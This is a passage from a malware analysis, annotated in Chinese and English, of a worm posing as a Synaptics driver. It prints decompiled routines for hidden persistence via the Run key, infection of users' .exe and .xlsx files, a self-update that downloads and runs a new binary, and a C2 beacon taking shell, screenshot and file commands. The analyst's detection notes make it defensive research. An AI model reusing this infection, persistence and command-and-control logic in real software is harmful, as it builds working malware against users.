__writefsdword(0, v6);
__writefsdword(0, v9);
__writefsdword(0, v12);
v13 = &loc_499823;
return LStrArrayClr(&v14, 0x3F);
}
4.3 判斷程式是否在Synaptics目錄下
// Excerpt of the branch inside ControlCenter_49A3E0 (the enclosing function
// is shown in full above). The callee returns 1 when the running binary is
// NOT inside Synaptics_appdir and, as a side effect, installs a copy there.
if ( not_under_Synaptics_appdir_498B40(this) )// skipped when already under Synaptics_appdir;
// otherwise the callee does CreateDir, copies the program and updates the resource
{
// the program is not in the Synaptics directory:
// relaunch the installed copy with the "InjUpdate" argument
exec_InjUpdate_498998(this);
}
else
{
// the running program is inside the Synaptics directory
// component switches come from the parsed config; all default to true
v19 = StrToBoolDef(flag_TCP_Client_49F1B0, 1);
v17 = StrToBoolDef(flag_useb_hook_49F1B4, 1);
v16 = StrToBoolDef(flag_Directory_Watcher_49F1B8, 1);
v15 = StrToBoolDef(flag_Keyboar_Hook_49F1BC, 1);
v14 = StrToBoolDef(flag_Auto_Mail_Sender_49F1C0, 1);
v13 = StrToBoolDef(flag_Auto_Update_49F1A8, 1);
v11 = StrToBoolDef(flag_inj_spec_exe_and_excel_49F1A4, 1);
handle_49A098(this, v11, v13, v19, v17, v16, v15, v14);
// same call as sub_499FAC in the full listing above, renamed by the analyst
regmon_run_and_inj_499FAC(this, 1);
}
當程式不在Synaptics_appdir 目錄下時
- Synaptics目錄不存在時建立,設定屬性FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM
- 複製檔案到Synaptics目錄下Synaptics.exe
- 移除EXERESX資源,即Synaptics.exe將只存在病毒本體,不含被感染的原始檔
- 設定登錄檔Run開機自啟動 "Synaptics Pointing Device Driver"
/// Checks whether the running binary lives in Synaptics_appdir_49F144 and,
/// if not, installs the worm there:
///   1. create the directory with HIDDEN|SYSTEM attributes,
///   2. copy itself to <appdir>\<name>.exe,
///   3. strip the EXERESX resource from that copy (bare worm, no host program),
///   4. register <appdir>\<name>.exe under the Run key, value name taken from
///      the binary's ProductName / FileDescription, else the literal
///      "Synaptics Pointing Device Driver".
/// a1 is the log sink for str_add_4967D4.
/// Returns 0 when already under the appdir, 1 otherwise (low byte of result).
/// Detection note: a hidden+system ProgramData\Synaptics directory and a
/// Run value pointing into it are the persistence artefacts of this routine.
int __fastcall not_under_Synaptics_appdir_498B40(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v29 = a1;
v12[2] = &savedregs;
v12[1] = &loc_498E26;
v12[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v12);
// compare the directory of the running executable with the install dir
// (v1 is the decompiler's view of the LStrCmp equality result)
ParamStr(0, &System__AnsiString);
ExtractFileDir(System__AnsiString, &v26);
LStrCmp(v26, Synaptics_appdir_49F144);
if ( v1 )
{
// already running from the Synaptics directory: return 0
v28 = 0;
}
else
{
// not in the Synaptics directory: return 1 after installing
v28 = 1;
if ( !DirectoryExists(Synaptics_appdir_49F144) )
{
// create the Synaptics directory when it does not exist
v11 = &savedregs;
v10 = &loc_498C00;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
v2 = LStrToPChar(Synaptics_appdir_49F144);
LStrFromPChar(&v24, v2);
CreateDir(v24);
// FILE_ATTRIBUTE_HIDDEN
// 2 (0x2)
// The file or directory is hidden; it is not shown in ordinary directory listings.
// FILE_ATTRIBUTE_SYSTEM
// 4 (0x4)
// A file or directory that the operating system uses in part or exclusively.
FileSetAttr(Synaptics_appdir_49F144, 6u);
LStrCat3(&v23, "CreateDir -> ", Synaptics_appdir_49F144);
str_add_4967D4(v29, v23);
__writefsdword(0, ExceptionList);
}
v11 = &savedregs;
v10 = &loc_498C8A;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
ParamStr(0, &v22);
v8[6] = v22;
// LStrCatN args are reversed in decompiler output: dest = <appdir>\<name>.exe
LStrCatN(&dest, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
// copy the running file into the Synaptics directory as <name>.exe
// (third arg 6 presumably sets HIDDEN|SYSTEM on the copy — verify copy_file_473804)
copy_file_473804(v8[3], dest, 6u);
LStrCatN(&v20, 4, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144, "APP Copy -> ");
str_add_4967D4(v29, v20);
__writefsdword(0, v8[0]);
v8[2] = &savedregs;
v8[1] = &loc_498D22;
v8[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v8);
LStrCatN(&v19, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
if ( FileExists(v19) )
{
LStrCatN(&v18, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
// remove the EXERESX resource: the installed <name>.exe then holds only the
// worm body, without the infected original program
remove_res_474B04(v18, 0, ptr_EXERESX_49D6B8);
LStrCat3(&v17, "Update Res -> ", ptr_EXERESX_49D6B8);
str_add_4967D4(v29, v17);
}
__writefsdword(0, v7[0]);
v7[2] = &savedregs;
v7[1] = &loc_498DFB;
v7[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v7);
// Run-key value name: ProductName, else FileDescription, else the literal
// below (matches the version info shown in the file information section)
ParamStr(0, &v16);
get_info_474948(v16, "ProductName", &v27);
if ( !v27 )
{
ParamStr(0, &v15);
get_info_474948(v15, "FileDescription", &v27);
}
if ( !v27 )
LStrLAsg(&v27, "Synaptics Pointing Device Driver");
// v6 (the hive selector passed below) is presumably this is-admin result — decompiler lost it
isadmin_by_CheckSCManagerAccess_4738BC(0);
LStrCatN(&fpath, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
// persistence: autostart entry under
// Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg_set_Run_47357C(v6, v27, fpath);
LStrCatN(&v13, 6, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144, " = ", v27, "Set Reg -> ");
str_add_4967D4(v29, v13);
__writefsdword(0, v4);
}
__writefsdword(0, v5);
result = LStrArrayClr(&v13, 0xF);
LOBYTE(result) = v28;
return result;
}
5、不在Synaptics目錄下時
// 程式不在Synaptics目錄時
// 附帶引數InjUpdate再次啟動
exec_InjUpdate_498998
/// Relaunches the installed copy <appdir>\<name>.exe with the command-line
/// argument "InjUpdate" and terminates the current process on success.
/// On XP a single exec_473490 attempt is made; on other versions a second
/// attempt follows if the first fails. The isadmin/wait arguments (v15/v13,
/// v14/v12, v9/v8) were not resolved by the decompiler; by analogy with
/// thread_InjUpdate_497CF0 the first attempt is presumably elevated and the
/// retry is not — verify in the disassembly.
/// Returns the LStrArrayClr result (string cleanup), not meaningful.
int __fastcall exec_InjUpdate_498998(Controls::TWinControl *this)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
dest = 0;
v23 = 0;
v22 = v1;
v21 = v3;
v20 = v2;
v19[2] = &savedregs;
v19[1] = &loc_498B06;
v19[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v19);
v18 = &savedregs;
v17[1] = &loc_498AE1;
v17[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v17);
// v5 is the decompiler's view of the LStrCmp equality result
get_win_ver_472EF0(&v26);
LStrCmp(v26, "XP");
if ( v5 )
{
// Windows XP: one attempt, then exit
Handle = TWinControl_GetHandle(this);
LStrCatN(&v23, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
if ( exec_473490(v11, v23, "InjUpdate", v15, v13) )
LABEL_6:
TApplication_Terminate(*Application[0]);
}
else
{
// other versions: two attempts with different flags before giving up
Handle = TWinControl_GetHandle(this);
LStrCatN(&lpFile, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
if ( exec_473490(v10, lpFile, "InjUpdate", v14, v12) )
goto LABEL_6;
TWinControl_GetHandle(this);
LStrCatN(&dest, 3, ptr_Synaptics_exe_49D6AC, "\\", Synaptics_appdir_49F144);
if ( exec_473490(v7, dest, "InjUpdate", v9, v8) )
goto LABEL_6;
}
// decompiler artefact: Handle here is the saved SEH record, not the HWND
__writefsdword(0, Handle);
__writefsdword(0, v17[0]);
v18 = &loc_498B0D;
return LStrArrayClr(&v23, 4);
}
5、在Synaptics目錄下時
監控&傳輸&感染指定檔案handle_49A098
5.1 感染特定目錄 inj_SpecialFolder_49834C
遍歷目錄,感染exe 和xlsx 檔案
/// Infects user document folders.
/// a1: log sink form; a2 != 0 enables the .exe pass; a3 != 0 enables the
/// .xlsx pass. Each pass collects matching files from the Personal, Desktop
/// and Downloads special folders (sub_4742BC with last arg 1 — presumably
/// recursive, verify), logs "Injecting -> <path>", runs inj_exe_4776D4 /
/// inj_excel_479748 over the list, and logs the per-file result strings the
/// injector wrote back into the same list.
/// Returns the LStrArrayClr result (string cleanup), not meaningful.
int __fastcall inj_SpecialFolder_49834C(void *a1, void *a2, void *a3)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// v36 = a3 (xlsx flag), v37 = a1 (log sink), v3 = a2 (exe flag)
v36 = _InterlockedExchange(&v37, a3);
v3 = a2;
v37 = a1;
v22 = &savedregs;
v21[1] = &loc_49863B;
v21[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v21);
// two TStringLists: v35 for .exe candidates, v34 for .xlsx candidates
LOBYTE(a2) = 1;
v35 = TObject_Create(VMT_418BE4_TStringList, a2);
LOBYTE(v4) = 1;
v34 = TObject_Create(VMT_418BE4_TStringList, v4);
if ( v3 )
{
v20 = &savedregs;
v19 = &loc_4984DA;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
// folder indices are Get_SpecialFolder_4730FC's own mapping (analyst labels)
// CSIDL_PERSONAL
Get_SpecialFolder_4730FC(5, &System__AnsiString);
// CSIDL_DESKTOP
Get_SpecialFolder_4730FC(6, &v32);
// Downloads
Get_SpecialFolder_4730FC(7, &v31);
if ( DirectoryExists(System__AnsiString) )
sub_4742BC(System__AnsiString, ".exe", v35, 1);
if ( DirectoryExists(v32) )
sub_4742BC(v32, ".exe", v35, 1);
if ( DirectoryExists(v31) )
sub_4742BC(v31, ".exe", v35, 1);
// TStringList_GetCount
v5 = (*(*v35 + 0x14))(v35);
if ( v5 - 1 >= 0 )
{
// log every candidate before infecting
v6 = v5;
v7 = 0;
do
{
// TStringList_Get
(*(*v35 + 0xC))(v35, v7, &v29);
LStrCat3(&v30, "Injecting -> ", v29);
str_add_4967D4(v37, v30);
++v7;
--v6;
}
while ( v6 );
}
// infect the collected executables with the EXERESX/EXEVSNX resources
inj_exe_4776D4(v35, ptr_EXERESX_49D6B8, ptr_EXEVSNX_49D6BC, I_EXEVSNX_49F14C, 1);
// TStringList_GetCount
v8 = (*(*v35 + 0x14))(v35);
if ( v8 - 1 >= 0 )
{
// inj_exe replaced each entry with a status string; log the non-empty ones
v9 = v8;
v10 = 0;
do
{
// TStringList_Get
(*(*v35 + 0xC))(v35, v10, &v28);
if ( v28 )
{
// TStringList_Get
(*(*v35 + 0xC))(v35, v10, &v27);
str_add_4967D4(v37, v27);
}
++v10;
--v9;
}
while ( v9 );
}
TObject_Free(v35);
__writefsdword(0, ExceptionList);
}
if ( v36 )
{
// same scheme for .xlsx files (inj_excel_479748 not analysed on this page)
v20 = &savedregs;
v19 = &loc_498616;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
Get_SpecialFolder_4730FC(5, &System__AnsiString);
Get_SpecialFolder_4730FC(6, &v32);
Get_SpecialFolder_4730FC(7, &v31);
if ( DirectoryExists(System__AnsiString) )
sub_4742BC(System__AnsiString, ".xlsx", v34, 1);
if ( DirectoryExists(v32) )
sub_4742BC(v32, ".xlsx", v34, 1);
if ( DirectoryExists(v31) )
sub_4742BC(v31, ".xlsx", v34, 1);
// TStringList_GetCount
v11 = (*(*v34 + 0x14))(v34);
if ( v11 - 1 >= 0 )
{
v12 = v11;
v13 = 0;
do
{
// TStringList_Get
(*(*v34 + 0xC))(v34, v13, &v25);
LStrCat3(&v26, "Injecting -> ", v25);
str_add_4967D4(v37, v26);
++v13;
--v12;
}
while ( v12 );
}
inj_excel_479748(v34);
v14 = (*(*v34 + 0x14))(v34);
if ( v14 - 1 >= 0 )
{
v15 = v14;
v16 = 0;
do
{
// TStringList_Get
(*(*v34 + 0xC))(v34, v16, &v24);
if ( v24 )
{
// TStringList_Get
(*(*v34 + 0xC))(v34, v16, &v23);
str_add_4967D4(v37, v23);
}
++v16;
--v15;
}
while ( v15 );
}
TObject_Free(v34);
__writefsdword(0, ExceptionList);
}
__writefsdword(0, v21[0]);
v22 = &loc_498642;
return LStrArrayClr(&v23, 0xB);
}
inj_exe
/// Infects every existing file listed in the TStringList a1.
/// a2: name of the payload resource (EXERESX), a3: name of the version
/// resource (EXEVSNX), a4: this worm's integer version, a5: forwarded to
/// copy_res_4774A8.
/// For each file: LoadLibraryA it, look for the version resource; if present
/// and its value >= a4 the file is skipped ("Infected Canceled"), otherwise
/// copy_res_4774A8 (re)writes the resources ("Vrs Updated" / "Completed").
/// The status string replaces the list entry (vtable +0x20 = TStrings.Put).
/// Returns the LStrArrayClr result (string cleanup), not meaningful.
int __fastcall inj_exe_4776D4(void *a1, void *a2, void *a3, int a4, void *a5)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// v26 = a3 (version resource name), v27 = a2 (payload resource), v28 = a1 (list)
v26 = _InterlockedExchange(&v28, a3);
v27 = a2;
v28 = a1;
LStrAddRef(a2);
LStrAddRef(v26);
v11 = &savedregs;
v10 = &loc_4778DD;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
// vtable +0x14 = GetCount, +0xC = Get
if ( (*(*v28 + 0x14))(v28, *v28) >= 1 )
{
v5 = (*(*v28 + 0x14))(v28) - 1;
if ( v5 >= 0 )
{
v24 = v5 + 1;
v25 = 0;
do
{
(*(*v28 + 0xC))(v28, v25, &v23);
if ( FileExists(v23) )
{
ExceptionList = &savedregs;
v8[1] = &loc_47789F;
v8[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v8);
(*(*v28 + 0xC))(v28, v25, &v22);
v6 = LStrToPChar(v22);
// the target is mapped into this process only to read its resources
hmodule_49EC78 = kernel32_LoadLibraryA(v6);
if ( find_res_4770E4(hmodule_49EC78, v26) )
{
// already carries a version resource: compare with our version
read_res_47717C(hmodule_49EC78, v26, &System__AnsiString);
if ( StrToInt(System__AnsiString) >= a4 )
{
// same or newer infection present: leave the file alone
kernel32_FreeLibrary_0(hmodule_49EC78);
(*(*v28 + 0xC))(v28, v25, &v13);
LStrCat3(&v14, "Infected Canceled -> ", v13);
(*(*v28 + 0x20))(v28, v25, v14);
}
else
{
// older infection: refresh the resources
// NOTE(review): no FreeLibrary in this branch — the module stays mapped
// while copy_res_4774A8 writes the file; possibly released inside copy_res
(*(*v28 + 0xC))(v28, v25, &v17, 1);
copy_res_4774A8(v17, v27, a5);
(*(*v28 + 0xC))(v28, v25, &v15);
LStrCat3(&v16, "Vrs Updated -> ", v15);
(*(*v28 + 0x20))(v28, v25, v16);
}
}
else
{
// clean file: inject the resources
kernel32_FreeLibrary_0(hmodule_49EC78);
(*(*v28 + 0xC))(v28, v25, &v21, 0);
copy_res_4774A8(v21, v27, a5);
(*(*v28 + 0xC))(v28, v25, &v19);
LStrCat3(&v20, "Completed -> ", v19);
(*(*v28 + 0x20))(v28, v25, v20);
}
__writefsdword(0, v8[0]);
}
++v25;
--v24;
}
while ( v24 );
}
}
__writefsdword(0, v10);
v12 = &loc_4778E4;
LStrArrayClr(&v13, 0xB);
return LStrArrayClr(&v26, 2);
}
inj_excel
//未分析
5.2 自動更新 Auto_Update_498270
定時執行更新服務端配置
/// Enables or disables the periodic self-update timer.
/// a1: form holding the TTimer at dword index 0xC7; flag_AutoUpdate: on/off;
/// a3 != 0 fires Auto_Update_Timer_498248 immediately; a4: interval in
/// seconds (multiplied by 0x3E8 = 1000 for TTimer.Interval).
/// Returns the str_add_4967D4 result when a log line was written, otherwise
/// the (null) timer pointer.
int __fastcall Auto_Update_498270(Controls::TWinControl *a1, char flag_AutoUpdate, char a3, int a4)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
if ( flag_AutoUpdate )
{
// lazily create the timer, set interval/handler, enable it
if ( !*(a1 + 0xC7) )
*(a1 + 0xC7) = TTimer_Create(VMT_42F470_TTimer);
TTimer_SetInterval(*(a1 + 0xC7), 0x3E8 * a4);
TTimer_SetOnTimer(Auto_Update_Timer_498248, a1);
LOBYTE(v5) = 1;
TTimer_SetEnabled(*(a1 + 0xC7), v5);
if ( a3 )
Auto_Update_Timer_498248(a1, a1, v6);
return str_add_4967D4(a1, "Auto Update -> Active");
}
else
{
// disable only if the timer was ever created
result = *(a1 + 0xC7);
if ( result )
{
TTimer_SetEnabled(result, 0);
return str_add_4967D4(a1, "Auto Update -> Deactive");
}
}
return result;
}
訪問服務端,有更新時下載配置到快取目錄 隨機字串(9個字元).ini 檔案中
透過ShellExecuteExA附帶引數InjUpdate再次啟動,結束本程序
/// Self-update worker thread.
/// After a 60 s delay (0xEA60 ms) it builds two temp paths with random names
/// (<Temp>\<9 chars>.exe and <Temp>\<7 chars>.ini), downloads the update INI
/// from up to three URLs, reads [CS] VER / PORT / EXEURL*, reconfigures the
/// TCP client port, and — if VER is greater than the local version — downloads
/// the new binary, disables all components (ControlCenter "Pasif"), launches
/// it with the "InjUpdate" argument and terminates this process.
/// Detection note: a randomly named .exe/.ini pair in %TEMP% plus a fetch of
/// the INI/EXE URLs from init_sysadress_498F04 characterise this routine.
/// Returns the LStrArrayClr result (string cleanup), not meaningful.
int __stdcall thread_InjUpdate_497CF0()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v16[2] = &savedregs;
v16[1] = &loc_49814B;
v16[0] = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, v16);
// 0xEA60 == 60000 ms
kernel32_Sleep_0(0xEA60u);
// lpFile = <Temp>\<random 9 chars>.exe (LStrCatN args are reversed in decompiler output)
Get_TempPath_4737B0(&v31);
v15 = v31;
randomstr_472D44(9, &v30);
LStrCatN(&lpFile, 4, ".exe", v30, "\\", v15);
// dest = <Temp>\<random 7 chars>.ini
Get_TempPath_4737B0(&v29);
v14 = v29;
randomstr_472D44(7, &v28);
LStrCatN(&dest, 4, ".ini", v28, "\\", v14);
// v32: "newer version available" flag
v32 = 0;
if ( Internet_GetConnectedState_474D34() )
{
// download the INI that carries the server-side configuration
v34 = 1;
while ( 1 )
{
// NOTE(review): the decompiler shows the same global (dword_49F174) for
// all three attempts; by analogy with the EXEURL switch below this is
// presumably INIURL1..3 (SERVER_ips_49F150 + 9..0xB) — verify in disassembly
if ( v34 == 1 || v34 == 2 || v34 == 3 )
LStrLAsg(&v33, dword_49F174);
v11 = &savedregs;
v10 = &loc_497F86;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
// Güncelleme Denetleniyor...
// Update under review...
str_add_4967D4(dword_49F13C, aG);
if ( http_get_474D50(v33, dest) )
break;
// Update Not Found
str_add_4967D4(dword_49F13C, aG_0);
__writefsdword(0, ExceptionList);
if ( ++v34 == 4 )
goto LABEL_13;
}
// parse the downloaded INI; each value falls back to the current global
LOBYTE(v0) = 1;
v1 = TCustomIniFile_Create(VMT_4300A8_TIniFile, v0, dest);
v8 = 0;
v7 = &v26;
// TIniFile_ReadString
(**v1)(v1, "CS", "VER", 0, &v26);
sub_4758E8(v26, s_EXEVSNX_49F1C8, &v27);
LStrAsg(&s_EXEVSNX_49F1C8, v27);
v8 = 0;
v7 = &v24;
// TIniFile_ReadString
(**v1)(v1, "CS", "PORT", 0, &v24);
sub_4758E8(v24, PORT_49F15C, &v25);
LStrAsg(&PORT_49F15C, v25);
v8 = 0;
v7 = &v22;
// TIniFile_ReadString
(**v1)(v1, "CS", "EXEURL1", 0, &v22);
sub_4758E8(v22, EXEURL1_49F168, &v23);
LStrAsg(&EXEURL1_49F168, v23);
v8 = 0;
v7 = &v20;
// NOTE(review): "EXEURL1" is read three times and each result is stored in
// EXEURL1_49F168, while the defaults are dword_49F16C / dword_49F170 —
// either a decompiler labelling issue or a bug in the sample (EXEURL2/3
// never updated from the INI); verify against the disassembly
(**v1)(v1, "CS", "EXEURL1", 0, &v20);
sub_4758E8(v20, dword_49F16C, &v21);
LStrAsg(&EXEURL1_49F168, v21);
v8 = 0;
v7 = &v18;
(**v1)(v1, "CS", "EXEURL1", 0, &v18);
sub_4758E8(v18, dword_49F170, &v19);
LStrAsg(&EXEURL1_49F168, v19);
// apply the (possibly new) C2 port to the TCP client component
v2 = StrToInt(PORT_49F15C);
sub_4957B4(tcp_act_49F140, v2);
// update only when the advertised version is newer than ours
if ( StrToInt(s_EXEVSNX_49F1C8) <= I_EXEVSNX_49F14C )
// Güncelleme Bulunamadý
// Update Not Found
str_add_4967D4(dword_49F13C, aG_0);
else
v32 = 1;
TObject_Free(v1);
DeleteFile(dest);
__writefsdword(0, ExceptionList);
LABEL_13:
if ( v32 )
{
// try EXEURL1..3 in order until the new binary is downloaded to lpFile
v34 = 1;
while ( 1 )
{
switch ( v34 )
{
case 1:
LStrLAsg(&v33, EXEURL1_49F168);
break;
case 2:
LStrLAsg(&v33, dword_49F16C);
break;
case 3:
LStrLAsg(&v33, dword_49F170);
break;
}
v11 = &savedregs;
v10 = &loc_498104;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &ExceptionList);
// Yeni Sürüm Ýndiriliyor...
// New Version Downloading...
str_add_4967D4(dword_49F13C, unk_49820C);
if ( http_get_474D50(v33, lpFile) )
break;
__writefsdword(0, ExceptionList);
if ( ++v34 == 4 )
goto LABEL_34;
}
// "Pasif": stop every component before handing over to the new binary
ControlCenter_49A3E0(dword_49F13C, 0);
// request elevation if we are admin or the host program ran elevated
v3 = flag_APPIsAdmin_49F148 || byte_49F149 != 0;
v8 = &savedregs;
v7 = &loc_4980E6;
v6 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, &v6);
// v4 is the decompiler's view of the LStrCmp equality result
get_win_ver_472EF0(&v17);
LStrCmp(v17, "XP");
if ( v4 )
{
// XP: plain launch of the downloaded file with "InjUpdate"
if ( !exec_473490(hwnd, lpFile, "InjUpdate", 0, 0) )
{
LABEL_32:
__writefsdword(0, v6);
__writefsdword(0, ExceptionList);
goto LABEL_34;
}
}
// other versions: elevated attempt first, non-elevated retry
else if ( !exec_473490(hwnd, lpFile, "InjUpdate", v3, 0) && !exec_473490(hwnd, lpFile, "InjUpdate", 0, 0) )
{
goto LABEL_32;
}
// the new instance took over: exit this one
TApplication_Terminate(*Application[0]);
goto LABEL_32;
}
}
LABEL_34:
__writefsdword(0, v12);
v13 = &loc_498152;
LStrArrayClr(&v17, 0xF);
LStrClr(&v33);
return LStrArrayClr(&lpFile, 2);
}
5.3 tcp_client 命令獲取、執行
CheckMe
/// TCP client poll: one command round-trip with the C2 server.
/// If TIdTCPClient_49F114 is connected, pauses the poll timer (dword_49F134),
/// sends the line "CheckMe", reads one newline-terminated reply and
/// dispatches it to one of six handlers (GetCMDAccess, GetScreenImage,
/// ListDisk, ListDir, DownloadFile, DeleteFile), then re-enables the timer.
/// If not connected, spawns re_httpget_tcpclient_495930 to re-resolve the
/// host over HTTP and reconnect.
/// a1 is forwarded to every handler.
/// Detection note: the plaintext "CheckMe\n" line on the configured port
/// (default 1199) is a usable network signature for this beacon.
/// Returns the LStrClr result (string cleanup), not meaningful.
int __fastcall sub_495BD4(void *a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v12 = 0;
v9 = &savedregs;
v8 = &loc_495D23;
ExceptionList = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&ExceptionList);
// TIdTCPConnection_Connected
if ( (*(unsigned __int8 (__fastcall **)(Idtcpclient::TIdTCPClient *, _DWORD))(*(_DWORD *)TIdTCPClient_49F114 + 0x54))(
TIdTCPClient_49F114,
*(_DWORD *)TIdTCPClient_49F114) )
{
// stop the poll timer while a command is being serviced
TTimer_SetEnabled(dword_49F134, 0);
// TIdTCPConnection_WriteLn — beacon line sent to the server
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, const char *))(*(_DWORD *)TIdTCPClient_49F114 + 0x7C))(
TIdTCPClient_49F114,
"CheckMe");
ExceptionList = 0xFFFFFFFF;
v6 = &v12;
// TIdTCPConnection_ReadLn — one "\n"-terminated command, no length limit, no timeout (both -1)
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, const char *, unsigned int, unsigned int, int *))(*(_DWORD *)TIdTCPClient_49F114 + 0x70))(
TIdTCPClient_49F114,
"\n",
0xFFFFFFFF,
0xFFFFFFFF,
&v12);
ExceptionList = (unsigned int)&savedregs;
v6 = (int *)&loc_495CD3;
v5 = NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)&v5);
// command dispatch; v2 is the decompiler's view of each LStrCmp equality result
LStrCmp(v12, "GetCMDAccess");
if ( v2 )
sub_495DD0(a1);
LStrCmp(v12, "GetScreenImage");
if ( v2 )
sub_495F14(a1);
LStrCmp(v12, "ListDisk");
if ( v2 )
sub_495FDC(a1);
LStrCmp(v12, "ListDir");
if ( v2 )
sub_4960C8(a1);
LStrCmp(v12, "DownloadFile");
if ( v2 )
sub_496254(a1);
LStrCmp(v12, "DeleteFile");
if ( v2 )
sub_496400(a1);
v3 = v5;
__writefsdword(0, (unsigned int)v5);
// resume polling
LOBYTE(v3) = 1;
TTimer_SetEnabled(dword_49F134, v3);
}
else
{
TTimer_SetEnabled(dword_49F134, 0);
// not connected: a worker thread re-resolves the TCP host/port via the
// afraid.org/api HTTP endpoint and reconnects
kernel32_CreateThread_0(0, 0, re_httpget_tcpclient_495930, 0, 0, &ThreadId);
}
__writefsdword(0, (unsigned int)v8);
v10 = &loc_495D2A;
return LStrClr(&v12);
}
DWORD __stdcall re_httpget_tcpclient_495930(LPVOID lpThreadParameter)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// Purpose: worker thread started by sub_495BD4 when the TCP client is not connected.
// Waits 1 s; if the network is up it resolves the C2 host (via an afraid.org/api lookup
// when the configured value is such a URL) and connects, otherwise it re-arms the poll
// timer. lpThreadParameter is unused. Returns whatever LStrArrayClr returns.
// Detection value: an HTTP request to a URL containing "afraid.org/api" followed by a
// new outbound TCP connection from this process is the observable sequence.
memset(v12, 0, sizeof(v12));
v11 = v1;
v10 = v3;
v9 = v2;
v8 = &savedregs;
v7[1] = (unsigned int)&loc_495B6E;
// try/finally frame for the whole thread body.
v7[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v7);
// 0x3E8 = 1000 ms
kernel32_Sleep_0(0x3E8u);
// sub_474D34 is the same routine the mail sender calls as Internet_GetConnectedState_474D34.
if ( sub_474D34() )
{
// Status line appended to the (hidden) form's log.
str_add_4967D4(*gvar_0049DBDC[0], (int)"Server Connecting...");
// Nested try/finally around host resolution and connect.
v6[2] = (unsigned int)&savedregs;
v6[1] = (unsigned int)&loc_495A09;
v6[0] = (unsigned int)NtCurrentTeb()->NtTib.ExceptionList;
__writefsdword(0, (unsigned int)v6);
// Delphi Pos(): nonzero when tcp_host_49F118 contains "afraid.org/api".
if ( LStrPos("afraid.org/api", tcp_host_49F118) )
{
// afraid.org/api: the configured "host" is really a URL. Fetch it over HTTP, split
// the body on '|' (0x7C) and take field 1 as the real C2 host (sub_475110 looks like a
// split/field-extract helper — TODO confirm).
http_get_474FC0(tcp_host_49F118, (int)&v13);
sub_475110(v13, 0x7C, 1, (int)&v14);
LStrAsg(&tcp_host_49F118, v14);
}
// TIdTCPClient_SetHost (VMT slot +0x88)
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, int, void *))(*(_DWORD *)TIdTCPClient_49F114 + 0x88))(
TIdTCPClient_49F114,
tcp_host_49F118,
*(void **)TIdTCPClient_49F114);
// TIdTCPClient_SetPort (VMT slot +0x8C); tcp_post_49F124 is the port global (sic: "post")
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, int, void *))(*(_DWORD *)TIdTCPClient_49F114 + 0x8C))(
TIdTCPClient_49F114,
tcp_post_49F124,
*(void **)TIdTCPClient_49F114);
// TIdTCPClient_Connect (VMT slot +0x94); dword_49F12C is presumably the connect timeout — TODO confirm
(*(void (__fastcall **)(Idtcpclient::TIdTCPClient *, int, void *))(*(_DWORD *)TIdTCPClient_49F114 + 0x94))(
TIdTCPClient_49F114,
dword_49F12C,
*(void **)TIdTCPClient_49F114);
__writefsdword(0, v6[0]);
}
else
{
// No network: re-enable the poll timer so the next cycle retries later.
LOBYTE(v4) = 1;
TTimer_SetEnabled(dword_49F134, v4);
}
__writefsdword(0, v7[0]);
v8 = (int *)&loc_495B75;
return LStrArrayClr(v12, 6);
}
5.4 USB_Hooks
int __fastcall USB_Hooks_496E18(int a1, unsigned __int8 a2)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
